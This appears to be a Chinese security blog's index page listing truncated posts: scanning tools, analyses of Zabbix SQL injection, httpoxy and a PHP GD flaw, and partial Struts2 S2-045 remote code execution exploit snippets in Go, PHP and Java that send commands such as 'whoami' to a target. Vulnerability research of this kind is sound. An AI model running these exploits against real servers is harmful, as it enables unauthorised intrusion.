![[原创工具]Falcon子域名扫描工具1.0版本发布](https://static.jisec.com/uploads/2016/04/1111111111111111111111-300x209.png)
.
作者: Falcon
博客: https://www.jisec.com
文件名称 : Falcon子域名扫描工具.exe
文件大小 : 3562496 byte :
文件类型 : application/x-dosexec
MD5:a33c5adba55a5430bfabc40910704e69
SHA1:da3e4d43f6b879d75cfdad71f2f42b83e17b4007
本人开发的一款根据域名查询子域名的工具,渗透必备神器,有返回网站Title,想必不说大家也知道有什么用了吧,扫描出所有的子域名,然后返回服务器状态,服务器类型,子域名网站的Title,这样找出系...
Falcon, Falcon子域名扫描工具, 子域名扫描阅读全文
![[原创工具]Web安全扫描器FalconPathScan](https://static.jisec.com/uploads/2016/03/FB2D8E30-6B1F-4E58-9632-1A2C1ABF5851.jpg)
Falcon PathScan(猎鹰路径扫描器)
作者: Falcon
博客: https://www.jisec.com
能够根据字典快速扫描出站点存在的路径,文件,基于python 的一款扫描器,适和在 windows, linux, mac 下运行
# Enumeration web path scanning tools, use the dictionary
# Coded By Falcon - www.jisec.com
# Use the help, for example falcon.py http://www.google.com/ 10
# 10 is the thread here
# The results of the scan in FalconP...
Falcon PathScan, FalconPathScan, 猎鹰路径扫描器阅读全文
Author: Orange Tsai(@orange_8361) from DEVCORE
Recently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities.
This is an simple and interesting case, and seems easy to exploit in real world!
Affected
All PHP version
PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1
Vulnerability Details
The vulnerability is on the file ext...
CVE-2018-5711, GD漏洞阅读全文
其实Struts2代码执行原理很简单, 再来一个golang版的 , 不用怀疑, 我写这么多版本其实就是用来搞笑的
package main
import (
"fmt"
"os"
"net/http"
"io/ioutil"
"strings"
)
func httpGet(url, commend string) (result string) {
var ret string
if "http" != substr(url, 0 , 4) {
url = "http://" + url
}
resp, err := http.Get(url)
if err != nil {
ret = "网站无法正常打开!"
}
defer resp.Body.Clo...
S2-045 for golang, Struts2爆远程代码执行漏洞阅读全文
/**
* Created by IntelliJ IDEA.
* User: jisec.com
* Date: 2017/3/7
* Time: 下午4:45
*/
function getContext($url, $content, $commend){
$ret = http_request($url, null, $commend);
printf($ret);
};
function http_request($url, $data = null, $commend = "whoami")
{
$curl = curl_init();
$header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
$header[0] .= "text/html;q=0.9,text...
CVE-2017-5638, S2-045阅读全文
https://github.com/Mofree/SecurityTools/tree/master/script
package demo;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
public class Stpoc {
public Stpoc() {
}
public static String getContext(URL url, String encode, String commend) {
StringBuffer contentBuffe...
CVE-2017-5638, S2-045, Struts2爆远程代码执行漏洞阅读全文
Golang支持交叉编译,也就是说你在32位平台的机器上开发,可以编译生成64位平台上的可执行程序.mac 下可以编译linux 下的执行程序 又或者windows下的执行程序
交叉编译依赖下面几个环境变量:
$GOARCH 目标平台(编译后的目标平台)的处理器架构(386、amd64、arm)
$GOOS 目标平台(编译后的目标平台)的操作系统(darwin、freebsd、linux、windows)
各平台的GOOS和GOARCH参考
OS ARCH ...
go, golang, Golang交叉编译, Golang跨平台阅读全文
ELK平台介绍
在搜索ELK资料的时候,发现这篇文章比较好,于是摘抄一小段:
以下内容来自:http://baidu.blog.51cto.com/71938/1676798
日志主要包括系统日志、应用程序日志和安全日志。系统运维和开发人员可以通过日志了解服务器软硬件信息、检查配置过程中的错误及错误发生的原因。经常分析日志可以了解服务器的负荷,性能安全性,从而及时采取措施纠正错误。
通常,日志被分散的储存不同的设备上。如果你管理数十上百台服务器...
ElasticSearch, ELK, Kibana, Logstash阅读全文
Zabbix SQL Injection
zabbix(音同 zæbix)是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
就在昨天,Freebuf爆出了Zabbix的最新SQL注入漏洞,详情请查看:http://www.freebuf.com/vuls/112197.html
影响程度
影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)
漏洞条件:系统未禁止Guest用户
攻击成本:低
漏洞危害:高
漏洞分析
在Zabbix中有两个文件存在SQL注入漏洞,分别是jsrpc.php...
zabbix, zabbix新0day, zabbix爆最新0day阅读全文
httpoxy远程代理感染,CGI应用程序的漏洞
影响范围使用php,python,go做CGI服务
漏洞详情及利用方式
http://m.bobao.360.cn/learning/detail/2903.html
http://zone.wooyun.org/content/28533
漏洞公布地址
https://httpoxy.org/
漏洞测试脚本 https://access.redhat.com/security/vulnerabilities/httpoxy
测试方式
在 Apache httpd.conf
寻找其中一行如:
# ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
看是否...
CGI应用程序的漏洞阅读全文
友情链接随机显示不分先后
游侠安全网
90' s Blog
源尖
清林博客
phithon's Blog
Lcy's Blog
Seay博客
小赖子的英国生活和资讯
IT学习网
王松_Striker
暗月博客
Wd0g's Blog
极安全
核攻击
御风而行
黑夜路人
梧桐雨软件园
清松博客
授权服务器更换了
kali下go环境已经安装 怎么运行
已添加
申请友链www.ourlove520.com 已添加,不加请告诉下!
初次来到!
可是 Memcached 不需要额外模块即支持长连接了啊,难道自带的不好用?
真的不错
测试
很不错的